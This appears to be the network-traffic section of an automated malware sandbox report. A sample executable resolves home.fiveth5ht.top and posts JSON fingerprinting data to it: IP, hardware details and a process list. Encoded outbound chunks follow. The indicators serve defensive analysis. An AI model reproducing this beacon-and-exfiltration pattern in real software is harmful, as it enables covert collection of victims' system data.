Dec 27, 2024 09:10:14.788453102 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.788455963 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.788556099 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.788564920 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.788619041 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.788691998 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.788841963 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.788846970 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.788855076 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.788898945 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.788963079 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.789005995 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.789062023 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.789076090 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.789160967 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.789165974 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.789299011 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.789340973 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.789345026 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.789361954 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.816548109 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.816730976 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.860739946 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.905144930 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.905153990 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.905177116 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.905194998 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.905358076 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.905363083 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.905365944 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.905807018 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.905930042 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.906977892 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.906984091 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.907107115 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.907110929 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.907255888 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.907285929 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.907536983 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.907541037 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.907565117 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.907577991 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.907735109 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.907738924 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.907845020 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.908004045 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.908123016 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.908185005 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.908266068 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.908360004 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.908415079 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.908461094 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.908664942 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.908668995 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.908703089 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.908840895 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.908886909 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.908890963 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909010887 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909013987 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909113884 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909117937 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909312963 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909317970 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909326077 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909356117 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909497976 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909554005 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909557104 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909615993 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909657001 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909722090 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909889936 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909902096 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909909964 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.909979105 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.910031080 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.910033941 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.910125971 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.910130024 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.910243988 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.910247087 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.910432100 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.910439014 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.910478115 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.910482883 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.910763979 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:15.025484085 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.025490046 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.025916100 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.025924921 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.025928974 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.026072979 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.026077032 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.026207924 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.026211023 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.026220083 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.026456118 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.026591063 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.026595116 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.026679993 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.026684999 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.026693106 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.026698112 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.026981115 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.026983976 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.026993036 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.026998043 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.027195930 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.027200937 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.027359009 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.027435064 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.027439117 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.027534008 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.027538061 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.027606010 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.027738094 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.027795076 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.027797937 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.027833939 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.027862072 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.027971983 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.028012991 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.028369904 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.028373003 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.028383017 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.028387070 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.028422117 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.028425932 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.028461933 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.028621912 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.028625011 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.028635979 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.028810024 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.028812885 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.029129028 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.029131889 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.029136896 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.029149055 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.029154062 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.029189110 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.030512094 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.030515909 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.030524969 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.030774117 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.030781984 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.030785084 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.030822992 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.030834913 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.030983925 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.030987978 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.031071901 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.031112909 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.031158924 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.031512022 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.031706095 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.031709909 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.031718016 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.031953096 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.031961918 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.031965971 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032159090 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032296896 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032299995 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032308102 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032485962 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032490015 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032497883 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032516956 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032814980 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032830954 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032834053 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032847881 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032851934 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032864094 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032866955 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032870054 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032874107 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.032952070 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.033138990 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.033140898 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:15.033149004 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:20.335683107 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:20.335720062 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:20.335798025 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:20.336182117 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:20.455698013 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:20.547631025 CET	49726	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:20.667165995 CET	80	49726	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:20.667270899 CET	49726	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:20.667598009 CET	49726	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:20.787034988 CET	80	49726	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:22.178390980 CET	80	49726	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:22.178428888 CET	80	49726	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:22.178523064 CET	49726	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:22.179039955 CET	49726	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:22.298520088 CET	80	49726	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:22.441041946 CET	49735	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:22.560553074 CET	80	49735	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:22.560633898 CET	49735	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:22.560959101 CET	49735	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:22.680444956 CET	80	49735	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:24.211860895 CET	80	49735	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:24.212073088 CET	80	49735	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:24.212199926 CET	49735	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:24.212315083 CET	49735	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:24.331737995 CET	80	49735	5.101.3.217	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 09:10:08.814472914 CET	61790	53	192.168.2.6	1.1.1.1
Dec 27, 2024 09:10:08.814553976 CET	61790	53	192.168.2.6	1.1.1.1
Dec 27, 2024 09:10:08.953466892 CET	53	61790	1.1.1.1	192.168.2.6
Dec 27, 2024 09:10:09.118590117 CET	53	61790	1.1.1.1	192.168.2.6
Dec 27, 2024 09:10:13.194704056 CET	53640	53	192.168.2.6	1.1.1.1
Dec 27, 2024 09:10:13.194817066 CET	53640	53	192.168.2.6	1.1.1.1
Dec 27, 2024 09:10:13.333101988 CET	53	53640	1.1.1.1	192.168.2.6
Dec 27, 2024 09:10:13.333112955 CET	53	53640	1.1.1.1	192.168.2.6
Dec 27, 2024 09:10:20.408469915 CET	53642	53	192.168.2.6	1.1.1.1
Dec 27, 2024 09:10:20.408529043 CET	53642	53	192.168.2.6	1.1.1.1
Dec 27, 2024 09:10:20.546612024 CET	53	53642	1.1.1.1	192.168.2.6
Dec 27, 2024 09:10:20.546863079 CET	53	53642	1.1.1.1	192.168.2.6
Dec 27, 2024 09:10:22.302170992 CET	52019	53	192.168.2.6	1.1.1.1
Dec 27, 2024 09:10:22.302395105 CET	52019	53	192.168.2.6	1.1.1.1
Dec 27, 2024 09:10:22.439624071 CET	53	52019	1.1.1.1	192.168.2.6
Dec 27, 2024 09:10:22.439631939 CET	53	52019	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 09:10:08.814472914 CET	192.168.2.6	1.1.1.1	0x321d	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 27, 2024 09:10:08.814553976 CET	192.168.2.6	1.1.1.1	0x1e55	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 27, 2024 09:10:13.194704056 CET	192.168.2.6	1.1.1.1	0xd934	Standard query (0)	home.fiveth5ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 09:10:13.194817066 CET	192.168.2.6	1.1.1.1	0xeb4e	Standard query (0)	home.fiveth5ht.top	28	IN (0x0001)	false
Dec 27, 2024 09:10:20.408469915 CET	192.168.2.6	1.1.1.1	0xc2a4	Standard query (0)	home.fiveth5ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 09:10:20.408529043 CET	192.168.2.6	1.1.1.1	0x6c8	Standard query (0)	home.fiveth5ht.top	28	IN (0x0001)	false
Dec 27, 2024 09:10:22.302170992 CET	192.168.2.6	1.1.1.1	0x34f7	Standard query (0)	home.fiveth5ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 09:10:22.302395105 CET	192.168.2.6	1.1.1.1	0xde81	Standard query (0)	home.fiveth5ht.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 09:10:09.118590117 CET	1.1.1.1	192.168.2.6	0x321d	No error (0)	httpbin.org	3.218.7.103	A (IP address)	IN (0x0001)	false
Dec 27, 2024 09:10:09.118590117 CET	1.1.1.1	192.168.2.6	0x321d	No error (0)	httpbin.org	34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 27, 2024 09:10:13.333112955 CET	1.1.1.1	192.168.2.6	0xd934	No error (0)	home.fiveth5ht.top	5.101.3.217	A (IP address)	IN (0x0001)	false
Dec 27, 2024 09:10:20.546863079 CET	1.1.1.1	192.168.2.6	0xc2a4	No error (0)	home.fiveth5ht.top	5.101.3.217	A (IP address)	IN (0x0001)	false
Dec 27, 2024 09:10:22.439624071 CET	1.1.1.1	192.168.2.6	0x34f7	No error (0)	home.fiveth5ht.top	5.101.3.217	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.fiveth5ht.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	5.101.3.217	80	3604	C:\Users\user\Desktop\OoYYtngD7d.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 09:10:13.455463886 CET	12360	OUT	POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: / Content-Type: application/json Content-Length: 443559 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 31 35 37 33 34 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8452132140001157346", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", [TRUNCATED]
Dec 27, 2024 09:10:13.575053930 CET	2472	OUT	Data Raw: 34 4a 4f 36 72 34 59 76 42 42 66 66 47 6e 7a 4c 4f 5a 79 74 6e 71 55 50 77 31 4c 57 74 79 4f 53 45 62 50 6a 37 39 78 64 42 51 54 4a 61 79 4d 58 58 61 7a 52 74 4e 44 73 6d 65 6c 61 5c 2f 38 45 73 6c 75 63 5a 2b 4f 5c 2f 6c 6b 39 76 38 41 68 57 47 Data Ascii: 4JO6r4YvBBffGnzLOZytnqUPw1LWtyOSEbPj79xdBQTJayMXXazRtNDsmela\/8EslucZ+O\/lk9v8AhWG7\/wB6Guece9fwfiP2mf0IsJXqYbE+NU6Fem7Tp1PDPxfjJdU1fgC0oyXvRnFuMotSi3Fpv+14fs6\/pjVKcatPwfjOnJXUo+IfhXJP7uOLprZppOLumk0fkPRX7M23\/BJQXH\/NwOz\/ALpTu\/8Aekr\/AJx61
Dec 27, 2024 09:10:13.575126886 CET	4944	OUT	Data Raw: 2f 4c 6e 5c 2f 41 4c 64 4b 6b 6a 65 5a 76 2b 63 50 2b 39 5c 2f 35 5a 41 31 48 75 64 6c 32 5a 5c 2f 7a 39 66 38 5c 2f 6e 54 5c 2f 37 5c 2f 41 4d 6e 79 5a 36 2b 62 36 39 5c 2f 35 5c 2f 77 41 36 5a 5c 2f 63 66 5a 6e 39 37 35 76 66 70 5c 2f 68 5c 2f Data Ascii: /Ln\/ALdKkjeZv+cP+9\/5ZA1Hudl2Z\/z9f8\/nT\/7\/AMnyZ6+b69\/5\/wA6Z\/cfZn975vfp\/h\/hQdcNvn+iIfL27\/kfb5v\/AC0H4fXrTPn+V\/8AXOf9b\/n\/AD2qXnO\/95\/nn7V\/X\/69NkjPyfPhx\/n86ie3z\/Rm9Pr8v1IfM3Ns\/jP\/ADzP+uz\/AJ9feoambfIXj7SfX9z9Ov8AntzTOu\/5JN\/\
Dec 27, 2024 09:10:13.575213909 CET	4944	OUT	Data Raw: 47 50 43 4c 69 48 78 4b 7a 58 4b 75 44 73 4c 78 44 78 5a 6b 5c 2f 45 73 73 5c 2f 7a 7a 44 38 4b 5a 35 78 44 69 63 76 6f 34 6e 44 59 66 4a 4d 44 57 79 7a 4d 38 52 6c 39 53 72 68 4b 47 66 5a 76 77 76 54 7a 61 74 68 73 72 70 35 70 69 63 4a 5c 2f 54 Data Ascii: GPCLiHxKzXKuDsLxDxZk\/Ess\/zzD8KZ5xDicvo4nDYfJMDWyzM8Rl9SrhKGfZvwvTzathsrp5picJ\/T5X8f3\/BWn4YeEPhh\/wAFCtRufBemW+iQ\/Fv4C+Gviv4v0+whitNOuvGtz468V+DtQ1iOzt0jgjutUtPCltqepzhBLf61qOr6pdNLeahczSfvx+x3+1r8Z\/j347+IHgP4o\/ADXvANn4O8PaLrth8TIPCnxb8H
Dec 27, 2024 09:10:13.575301886 CET	4944	OUT	Data Raw: 68 2b 48 58 69 71 79 65 4b 30 31 48 53 5c 2f 46 46 74 66 32 73 6b 63 39 6a 63 79 77 7a 52 58 56 6e 63 78 4e 48 4e 48 50 70 55 77 56 70 37 53 34 68 5a 34 35 59 37 69 47 61 43 57 4d 75 72 62 6c 79 4b 5c 2f 67 7a 36 53 50 48 64 4c 77 39 34 30 71 34 Data Ascii: h+HXiqyeK01HS\/FFtf2skc9jcywzRXVncxNHNHPpUwVp7S4hZ45Y7iGaCWMurblyK\/gz6SPHdLw940q4HNMqjnXD\/F2XcMZzjMBUoYyHtMTkWZYmhUjgswo4jDUcLi6+FwNPC4rnlXl9Uq0pSoaUZH+nv0P+Aa\/if4bvHZRmscj4o4Mzbi7IMDmsK+CqVMLg+IcswOMpVMZltehiq+KwlHGZhWxGEcaeHg8VRxFOOITdaJ+
Dec 27, 2024 09:10:13.575411081 CET	4944	OUT	Data Raw: 30 37 34 35 5c 2f 70 54 30 6a 47 31 5c 2f 77 42 7a 48 73 78 5c 2f 48 39 4f 4c 58 5c 2f 72 2b 37 30 79 54 50 6d 50 5c 2f 41 4f 30 5c 2f 33 45 48 70 39 66 66 72 57 5a 71 4d 6a 32 65 59 64 2b 64 5c 2f 2b 71 6c 5c 2f 2b 53 76 77 5c 2f 70 54 42 49 57 Data Ascii: 0745\/pT0jG1\/wBzHsx\/H9OLX\/r+70yTPmP\/AO0\/3EHp9ffrWZqMj2eYd+d\/+ql\/+Svw\/pTBIW+dHy\/\/ADz\/AOnfHpnr0p+5PnR3+SX7P\/y1\/wDJr+nWofnXfsTy\/wB3\/q4\/+W3+ld\/0\/wA80HQQyNuZETL\/APHxj+X+e\/5cs8w\/cRN\/7r+n4\/6djtjuB9JlX5tgyj\/5\/wBF+tEmWWZ\/3efK8
